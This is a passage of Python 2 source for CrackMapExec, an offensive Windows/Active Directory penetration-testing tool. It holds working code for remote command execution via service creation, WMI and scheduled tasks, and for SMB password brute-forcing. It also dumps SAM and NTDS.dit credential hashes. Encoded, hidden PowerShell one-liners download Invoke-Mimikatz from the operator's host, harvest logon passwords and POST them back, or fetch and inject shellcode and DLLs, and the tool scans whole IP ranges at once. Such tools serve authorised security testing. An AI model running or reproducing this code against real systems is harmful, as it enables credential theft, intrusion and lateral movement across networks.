taskCreated = False
try:
logging.info('Creating task \\%s' % self.__tmpName)
tsch.hSchRpcRegisterTask(dce, '\\%s' % self.__tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
taskCreated = True
logging.info('Running task \\%s' % self.__tmpName)
tsch.hSchRpcRun(dce, '\\%s' % self.__tmpName)
done = False
while not done:
logging.info('Calling SchRpcGetLastRunInfo for \\%s' % self.__tmpName)
resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % self.__tmpName)
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
sleep(2)
logging.info('Deleting task \\%s' % self.__tmpName)
tsch.hSchRpcDelete(dce, '\\%s' % self.__tmpName)
taskCreated = False
except tsch.DCERPCSessionError, e:
logging.info(e)
e.get_packet().dump()
finally:
if taskCreated is True:
tsch.hSchRpcDelete(dce, '\\%s' % self.__tmpName)
if self.__noOutput is False:
if self.__mode == 'SHARE':
smbConnection = rpctransport.get_smb_connection()
self.__smbConnection = smbConnection
waitOnce = True
while True:
try:
logging.info('Attempting to read ADMIN$\\Temp\\%s' % self.__tmpFileName)
smbConnection.getFile('ADMIN$', 'Temp\\%s' % self.__tmpFileName, output_callback)
break
except Exception, e:
if str(e).find('SHARING') > 0:
sleep(3)
elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if waitOnce is True:
# We're giving it the chance to flush the file before giving up
sleep(3)
waitOnce = False
else:
raise
else:
raise
elif self.__mode == 'SERVER':
wait = 0
while wait < 5:
try:
with open(SMBSERVER_DIR + '/' + self.__tmpFileName,'r') as fd:
output_callback(fd.read())
break
except IOError:
sleep(1)
wait += 1
def cleanup(self):
logging.info('Deleting file ADMIN$\\Temp\\%s' % self.__tmpFileName)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % self.__tmpFileName)
self.__dceConnection.disconnect()
class RemoteShellsmbexec():
def __init__(self, share, rpc, mode, serviceName, command, noOutput=False):
self.__share = share
self.__mode = mode
self.__noOutput = noOutput
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__outputBuffer = ''
self.__command = command
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = serviceName
self.__rpc = rpc
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
def set_copyback(self):
s = self.__rpc.get_smb_connection()
s.setTimeout(100000)
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(svcctl.MSRPC_UUID_SVCCTL)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except Exception, e:
pass
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
if self.__mode == 'SHARE':
while True:
try:
self.transferClient.getFile(self.__share, self.__output, output_callback)
break
except Exception, e:
if "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
sleep(1)
pass
else:
logging.info('Error while reading command output: {}'.format(e))
raise SessionError
self.transferClient.deleteFile(self.__share, self.__output)
elif self.__mode == 'SERVER':
with open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r') as fd:
output_callback(fd.read())
#self.transferClient.deleteFile(self.__share, self.__output)
def execute_remote(self, data):
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
if self.__mode == 'SERVER' and self.__noOutput is False:
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
try:
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
except:
return
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
result = self.__outputBuffer
self.__outputBuffer = ''
return result
class CMDEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = '', share = None, command= None, noOutput=False):
if not protocols:
protocols = CMDEXEC.KNOWN_PROTOCOLS.keys()
self.__username = username
self.__password = password
self.__protocols = [protocols]
self.__serviceName = self.service_generator()
self.__domain = domain
self.__command = command
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = None
self.__doKerberos = None
self.__share = share
self.__noOutput = noOutput
self.__mode = 'SHARE'
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def service_generator(self, size=6, chars=string.ascii_uppercase):
return ''.join(random.choice(chars) for _ in range(size))
def run(self, addr):
result = ''
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
#logging.info("Trying protocol %s..." % protocol)
#logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
try:
self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command, self.__noOutput)
result = self.shell.send_data(self.__command)
except SessionError as e:
if 'STATUS_SHARING_VIOLATION' in str(e):
return
if self.__noOutput is False:
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
self.shell.set_copyback()
result = self.shell.send_data(self.__command)
smb_server.stop()
except (Exception, KeyboardInterrupt), e:
self.shell.finish()
sys.stdout.flush()
sys.exit(1)
return result
class RemoteShellwmi():
def __init__(self, share, win32Process, smbConnection, mode, noOutput=False):
self.__share = share
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = noOutput
self.__mode = mode
# We don't wanna deal with timeouts from now on.
self.__transferClient.setTimeout(100000)
self.__myIPaddr = self.__transferClient.getSMBServer().get_socket().getsockname()[0]
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
if self.__mode == 'SHARE':
while True:
try:
self.__transferClient.getFile(self.__share, self.__output, output_callback)
break
except Exception, e:
if "STATUS_SHARING_VIOLATION" in str(e):
sleep(1)
pass
else:
logging.info('Error while reading command output: {}'.format(e))
raise SessionError
self.__transferClient.deleteFile(self.__share, self.__output)
elif self.__mode == 'SERVER':
wait = 0
while wait < 5:
try:
with open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r') as fd:
output_callback(fd.read())
break
except IOError:
sleep(1)
wait += 1
def execute_remote(self, data):
command = self.__shell + data
if self.__noOutput is False:
if self.__mode == 'SERVER':
command += ' 1> ' + '\\\\{}\\{}\\{}'.format(self.__myIPaddr, DUMMY_SHARE, OUTPUT_FILENAME) + ' 2>&1'
elif self.__mode == 'SHARE':
command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1'
obj = self.__win32Process.Create(command, self.__pwd, None)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
result = self.__outputBuffer
self.__outputBuffer = ''
return result
class WMIEXEC:
def __init__(self, command = '', username = '', password = '', domain = '', hashes = '', share = None, noOutput=False):
self.__command = command
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = None
self.__share = share
self.__noOutput = noOutput
self.__doKerberos = False
self.__mode = "SHARE"
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr, smbConnection):
result = ''
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
try:
self.shell = RemoteShellwmi(self.__share, win32Process, smbConnection, self.__mode, self.__noOutput)
result = self.shell.send_data(self.__command)
except SessionError as e:
if self.__noOutput is False:
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.shell = RemoteShellwmi(self.__share, win32Process, smbConnection, self.__mode)
result = self.shell.send_data(self.__command)
smb_server.stop()
dcom.disconnect()
return result
class WMIQUERY:
def __init__(self, address, username, password, domain, hashes, namespace):
self.address = address
self.username = username
self.password = password
self.domain= domain
self.namespace = namespace
self.lmhash = ''
self.nthash = ''
if hashes:
self.lmhash, self.nthash = hashes.split(':')
def run(self, query):
record_dict = {}
dcom = DCOMConnection(self.address, self.username, self.password, self.domain, self.lmhash, self.nthash, None, oxidResolver = True, doKerberos=False)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin(self.namespace, NULL, NULL)
iWbemLevel1Login.RemRelease()
query = query.strip('\n')
if query[-1:] == ';':
query = query[:-1]
iEnumWbemClassObject = iWbemServices.ExecQuery(query.strip('\n'))
printHeader = True
while True:
try:
pEnum = iEnumWbemClassObject.Next(0xffffffff,1)[0]
record = pEnum.getProperties()
if printHeader is True:
for col in record:
record_dict[str(col)] = []
printHeader = False
for key in record:
record_dict[key].append(str(record[key]['value']))
except Exception as e:
if str(e).find('S_FALSE') < 0:
raise
else:
break
iEnumWbemClassObject.RemRelease()
dcom.disconnect()
return record_dict
class RPCENUM():
def __init__(self, username, password, domain='', hashes=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__ts = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def connect(self, host, service):
if service == 'wkssvc':
stringBinding = r'ncacn_np:{}[\PIPE\wkssvc]'.format(host)
elif service == 'srvsvc':
stringBinding = r'ncacn_np:{}[\PIPE\srvsvc]'.format(host)
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
if service == 'wkssvc':
dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.__ts)
elif service == 'srvsvc':
dce.bind(srvs.MSRPC_UUID_SRVS, transfer_syntax = self.__ts)
return dce, rpctransport
def enum_logged_on_users(self, host):
dce, rpctransport = self.connect(host, 'wkssvc')
users_info = {}
try:
resp = wkst.hNetrWkstaUserEnum(dce, 1)
return resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']
except Exception:
resp = wkst.hNetrWkstaUserEnum(dce, 0)
return resp['UserInfo']['WkstaUserInfo']['Level0']['Buffer']
def enum_sessions(self, host):
dce, rpctransport = self.connect(host, 'srvsvc')
session_info = {}
try:
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 502)
return resp['InfoStruct']['SessionInfo']['Level502']['Buffer']
except Exception:
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 0)
return resp['InfoStruct']['SessionInfo']['Level0']['Buffer']
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 1)
#resp.dump()
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 2)
#resp.dump()
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 10)
#resp.dump()
def spider(smb_conn,ip, share, subfolder, patt, depth):
try:
filelist = smb_conn.listPath(share, subfolder+'\\*')
dir_list(filelist, ip, subfolder, patt)
if depth == 0:
return 0
except SessionError:
return 1
for result in filelist:
if result.is_directory() and result.get_longname() != '.' and result.get_longname() != '..':
spider(smb_conn, ip, share,subfolder+'/'+result.get_longname().encode('utf8'), patt, depth-1)
return 0
def dir_list(files,ip,path,pattern):
for result in files:
for instance in pattern:
if instance in result.get_longname():
if result.is_directory():
print_att("//%s/%s/%s [dir]" % (ip, path.replace("//",""), result.get_longname().encode('utf8')))
else:
print_att("//%s/%s/%s" % (ip, path.replace("//",""), result.get_longname().encode('utf8')))
return 0
def bruteforce(host, smb, s_name, domain):
usernames = open(args.bruteforce[0], 'r')
passwords = open(args.bruteforce[1], 'r')
for user in usernames:
passwords.seek(0)
for passw in passwords:
try:
#print "Trying {}:{}".format(user.strip(),passw.strip())
smb.login(user.strip(), passw.strip(), domain, '', '')
print_succ("{}:{} {} Found valid account! Domain: {} Username: {} Password: {}".format(host, args.port, s_name, yellow(domain), yellow(user.strip()), yellow(passw.strip())))
if args.exhaust is False:
return
except SessionError as e:
if "STATUS_LOGON_FAILURE" in e.message:
pass
def normalize_path(path):
path = r'{}'.format(path)
path = ntpath.normpath(path)
share = path.split('\\')[0]
if ':' or '$' in share:
path = path.replace(share, '')
return path
def _listShares(smb):
permissions = {}
root = ntpath.normpath("\\{}".format(PERM_DIR))
for share in smb.listShares():
share_name = share['shi1_netname'][:-1].encode('utf8')
permissions[share_name] = "NO ACCESS"
try:
if smb.listPath(share_name, '', args.passwd):
permissions[share_name] = "READ"
except:
pass
try:
if smb.createDirectory(share_name, root):
smb.deleteDirectory(share_name, root)
permissions[share_name] = "READ, WRITE"
except:
pass
return permissions
def ps_command(command=None, katz_ip=None):
if katz_ip:
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit";
$request = [System.Net.WebRequest]::Create('http://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(addr=katz_ip)
return b64encode(command.encode('UTF-16LE'))
def inject_pscommand(localip):
if args.inject == 'shellcode':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
$WebClient = New-Object System.Net.WebClient;
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}');
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1])
if args.procid:
command += " -ProcessID {}".format(args.procid)
command += ';'
elif args.inject == 'exe' or args.inject == 'dll':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1');
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1])
if args.procid:
command += " -ProcID {}"
if args.inject == 'exe' and args.exeargs:
command += " -ExeArgs \"{}\"".format(args.exeargs)
command += ';'
return ps_command(command)
def connect(host):
try:
smb = SMBConnection(host, host, None, args.port)
try:
smb.login('' , '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.message:
pass
domain = args.domain
s_name = smb.getServerName()
if not domain:
domain = smb.getServerDomain()
if not domain:
domain = s_name
print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
#DC's seem to want us to logoff first
#Workstations sometimes reset the connection, so we handle that here
try:
smb.logoff()
except NetBIOSError:
pass
except socket.error:
smb = SMBConnection(host, host, None, args.port)
if args.bruteforce:
start_time = time()
print_status("{}:{} {} Started SMB bruteforce".format(host, args.port, s_name))
bruteforce(host, smb, s_name, domain)
print_status("{}:{} {} Finished SMB bruteforce (Completed in: {})".format(host, args.port, s_name, time() - start_time))
if args.user is not None and (args.passwd is not None or args.hash is not None):
lmhash = ''
nthash = ''
if args.hash:
lmhash, nthash = args.hash.split(':')
noOutput = False
smb.login(args.user, args.passwd, domain, lmhash, nthash)
local_ip = smb.getSMBServer().get_socket().getsockname()[0]
if args.download:
try:
out = open(args.download.split('\\')[-1], 'wb')
smb.getFile(args.share, args.download, out.write)
print_succ("{}:{} {} Downloaded file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.delete:
try:
smb.deleteFile(args.share, args.delete)
print_succ("{}:{} {} Deleted file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.upload:
try:
up = open(args.upload[0] , 'rb')
smb.putFile(args.share, args.upload[1], up.read)
print_succ("{}:{} {} Uploaded file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.list:
try:
dir_list = smb.listPath(args.share, args.list + '\\*')
print_succ("{}:{} Contents of {}:".format(host, args.port, args.list))
for f in dir_list:
print_att("%crw-rw-rw- %10d %s %s" % ('d' if f.is_directory() > 0 else '-', f.get_filesize(), ctime(float(f.get_mtime_epoch())) ,f.get_longname()))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.spider:
start_time = time()
print_status("{}:{} {} Started spidering".format(host, args.port, s_name))
spider(smb, host, args.share, args.spider, args.pattern, args.depth)
print_status("{}:{} {} Done spidering (Completed in {})".format(host, args.port, s_name, time() - start_time))
if args.wmi_query:
query = WMIQUERY(host, args.user, args.passwd, domain, args.hash, args.namespace)
res = query.run(args.wmi_query)
print_succ("{}:{} {} Executed specified WMI query:".format(host, args.port, s_name))
print yellow(' | '.join(res.keys()))
if len(res.values()) > 1:
for v in map(None, *res.values()):
print yellow(' | '.join(v))
else:
for k in res:
for v in res[k]:
print yellow(v)
if args.enum_sessions:
rpcenum = RPCENUM(args.user, args.passwd, domain, args.hash)
sessions = rpcenum.enum_sessions(host)
print_succ("{}:{} {} Current active sessions:".format(host, args.port, s_name))
for session in sessions:
for fname in session.fields.keys():
print "{} {}".format(fname, yellow(session[fname]))
print "\n"
if args.enum_lusers:
rpcenum = RPCENUM(args.user, args.passwd, domain, args.hash)
lusers = rpcenum.enum_logged_on_users(host)
print_succ("{}:{} {} Logged on users:".format(host, args.port, s_name))
for luser in lusers:
for fname in luser.fields.keys():
print "{} {}".format(fname, yellow(luser[fname]))
print "\n"
if args.sam:
sam_dump = DumpSecrets(host, args.user, args.passwd, domain, args.hash, True)
sam_dump.dump(smb)
if sam_dump.dumped_sam_hashes:
print_succ("{}:{} {} Dumping local SAM hashes (uid:rid:lmhash:nthash):".format(host, args.port, s_name))
for sam_hash in sam_dump.dumped_sam_hashes:
print_att(sam_hash)
try:
sam_dump.cleanup()
except:
pass
if args.ntds:
vss = False
ninja = False
if args.ntds == 'vss': vss = True
if args.ntds == 'ninja': ninja = True
ntds_dump = DumpSecrets(host, args.user, args.passwd, domain, args.hash, False, True, vss, ninja)
ntds_dump.dump(smb)
if ntds_dump.dumped_ntds_hashes:
print_succ("{}:{} {} Dumping NTDS.dit secrets using the {} method (domain\uid:rid:lmhash:nthash):".format(host, args.port, s_name, args.ntds.upper()))
for h in ntds_dump.dumped_ntds_hashes['hashes']:
print_att(h)
print_succ("{}:{} {} Kerberos keys grabbed:".format(host, args.port, s_name))
for h in ntds_dump.dumped_ntds_hashes['kerb']:
print_att(h)
ntds_dump.cleanup()
if args.enum_users:
user_dump = SAMRDump("{}/SMB".format(args.port), args.user, args.passwd, domain, args.hash).dump(host)
print_succ("{}:{} {} {} ( LockoutTries={} LockoutTime={} )".format(host, args.port, s_name, yellow(user_dump['users']), user_dump['lthresh'], user_dump['lduration']))
if args.mimikatz:
noOutput = True
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(ps_command(katz_ip=local_ip))
if args.pscommand:
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(ps_command(command=args.pscommand))
if args.inject:
noOutput = True
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(inject_pscommand(local_ip))
if args.command:
if args.execm == 'smbexec':
executer = CMDEXEC('{}/SMB'.format(args.port), args.user, args.passwd, domain, args.hash, args.share, args.command, noOutput)
result = executer.run(host)
if result:
print_succ('{}:{} {} Executed specified command via SMBEXEC'.format(host, args.port, s_name))
print_att(result)
elif args.execm == 'wmi':
executer = WMIEXEC(args.command, args.user, args.passwd, domain, args.hash, args.share, noOutput)
result = executer.run(host, smb)
if result:
print_succ('{}:{} {} Executed specified command via WMI'.format(host, args.port, s_name))
print_att(result)
elif args.execm == 'atexec':
atsvc_exec = TSCH_EXEC(args.user, args.passwd, args.command, domain, args.hash, noOutput)
atsvc_exec.play(host)
if atsvc_exec.output:
print_succ('{}:{} {} Executed specified command via ATEXEC'.format(host, args.port, s_name))
print_att(atsvc_exec.output)
atsvc_exec.cleanup()
if args.list_shares:
share_list = _listShares(smb)
print_succ('{}:{} {} Available shares:'.format(host, args.port, s_name))
print_att('\tSHARE\t\t\tPermissions')
print_att('\t-----\t\t\t-----------')
for share, perm in share_list.iteritems():
print_att('\t{}\t\t\t{}'.format(share, perm))
try:
smb.logoff()
except:
pass
except SessionError as e:
print_error("{}:{} {}".format(host, args.port, e))
if args.verbose: traceback.print_exc()
except DCERPCException as e:
print_error("{}:{} DCERPC Error: {}".format(host, args.port, e))
if args.verbose: traceback.print_exc()
except socket.error as e:
return
def concurrency(hosts):
''' Open all the greenlet threads '''
try:
pool = Pool(args.threads)
jobs = [pool.spawn(connect, str(host)) for host in hosts]
joinall(jobs)
except KeyboardInterrupt:
print_status("Got CTRL-C! Exiting..")
sys.exit()
if __name__ == '__main__':
if os.geteuid() is not 0:
print_error("Run me as r00t!")
sys.exit(1)
parser = argparse.ArgumentParser(description="""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r
Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://github.com/gojhonny/CredCrack
@pentestgeek's smbexec https://github.com/pentestgeek/smbexec
""",
formatter_class=RawTextHelpFormatter,
epilog='There\'s been an awakening... have you felt it?')
parser.add_argument("-t", type=int, dest="threads", required=True, help="Set how many concurrent threads to use")
parser.add_argument("-u", metavar="USERNAME", dest='user', default=None, help="Username, if omitted null session assumed")
parser.add_argument("-p", metavar="PASSWORD", dest='passwd', default=None, help="Password")
parser.add_argument("-H", metavar="HASH", dest='hash', default=None, help='NTLM hash')
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='Namespace name (default //./root/cimv2)')
parser.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, help="Domain name")
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
parser.add_argument("-P", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
rgroup = parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
rgroup.add_argument("--sam", action='store_true', help='Dump SAM hashes from target systems')
rgroup.add_argument("--mimikatz", action='store_true', help='Run Invoke-Mimikatz on target systems')
rgroup.add_argument("--ntds", choices={'vss', 'drsuapi', 'ninja'}, help="Dump the NTDS.dit from target DCs using the specifed method\n(drsuapi is the fastest)")
egroup = parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--shares", action="store_true", dest="list_shares", help="List shares")
egroup.add_argument("--sessions", action='store_true', dest='enum_sessions', help='Enumerate active sessions')
egroup.add_argument("--users", action='store_true', dest='enum_users', help='Enumerate users')
egroup.add_argument("--lusers", action='store_true', dest='enum_lusers', help='Enumerate logged on users')
egroup.add_argument("--wmi", metavar='QUERY', type=str, dest='wmi_query', help='Issues the specified WMI query')
dgroup = parser.add_argument_group("Account Bruteforcing", "Options for bruteforcing SMB accounts")
dgroup.add_argument("--bruteforce", nargs=2, metavar=('USER_FILE', 'PASS_FILE'), help="Your wordlists containing Usernames and Passwords")
dgroup.add_argument("--exhaust", action='store_true', help="Don't stop on first valid account found")
sgroup = parser.add_argument_group("Spidering", "Options for spidering shares")
sgroup.add_argument("--spider", metavar='FOLDER', type=str, default='', help='Folder to spider (defaults to share root dir)')
sgroup.add_argument("--pattern", type=str, default= '', help='Pattern to search for in filenames and folders')
sgroup.add_argument("--patternfile", type=argparse.FileType('r'), help='File containing patterns to search for')
sgroup.add_argument("--depth", type=int, default=1, help='Spider recursion depth (default: 1)')
cgroup = parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument('--execm', choices={"wmi", "smbexec", "atexec"}, default="smbexec", help="Method to execute the command (default: smbexec)")
cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL injection", "Options for injecting Shellcode/EXE/DLL's using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll'}, help='Inject Shellcode, EXE or a DLL')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
bgroup = parser.add_argument_group("Filesystem interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
bgroup.add_argument("--download", metavar="PATH", help="Download a file from the remote systems")
bgroup.add_argument("--upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the remote systems")
bgroup.add_argument("--delete", metavar="PATH", help="Delete a remote file")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.verbose:
print_status("Verbose output enabled")
logging.basicConfig(format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger()
log.setLevel(logging.INFO)
if args.path:
if not os.path.exists(args.path):
print_error('Unable to find Shellcode/EXE/DLL at specified path')
sys.exit(1)
if os.path.exists(args.target[0]):
hosts = []
with open(args.target[0], 'r') as target_file:
for target in target_file:
hosts.append(IPAddress(target))
elif '-' in args.target[0]:
ip_range = args.target[0].split('-')
try:
hosts = IPRange(ip_range[0], ip_range[1])
except AddrFormatError:
start_ip = IPAddress(ip_range[0])
start_ip_words = list(start_ip.words)
start_ip_words[-1] = ip_range[1]
start_ip_words = [str(v) for v in start_ip_words]
end_ip = IPAddress('.'.join(start_ip_words))
hosts = IPRange(start_ip, end_ip)
else:
hosts = IPNetwork(args.target[0])
args.list = normalize_path(args.list)
args.download = normalize_path(args.download)
args.delete = normalize_path(args.delete)
if args.upload: args.upload[1] = normalize_path(args.upload[1])
if args.spider:
patterns = []
if not args.pattern and not args.patternfile:
print_error("Please specify a '--pattern' or a '--patternfile'")
sys.exit(1)
if args.patternfile is not None:
for line in args.patternfile.readlines():
line = line.rstrip()
patterns.append(line)
patterns.append(args.pattern)
args.pattern = patterns
if args.mimikatz or args.inject or (args.ntds == 'ninja'):
print_status("Press CTRL-C at any time to exit")
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
t = Thread(name='HTTPServer', target=server.serve_forever)
t.setDaemon(True)
t.start()
concurrency(hosts)
if args.mimikatz or args.inject or args.ntds == 'ninja':
try:
while True:
sleep(1)
except KeyboardInterrupt:
sys.exit()
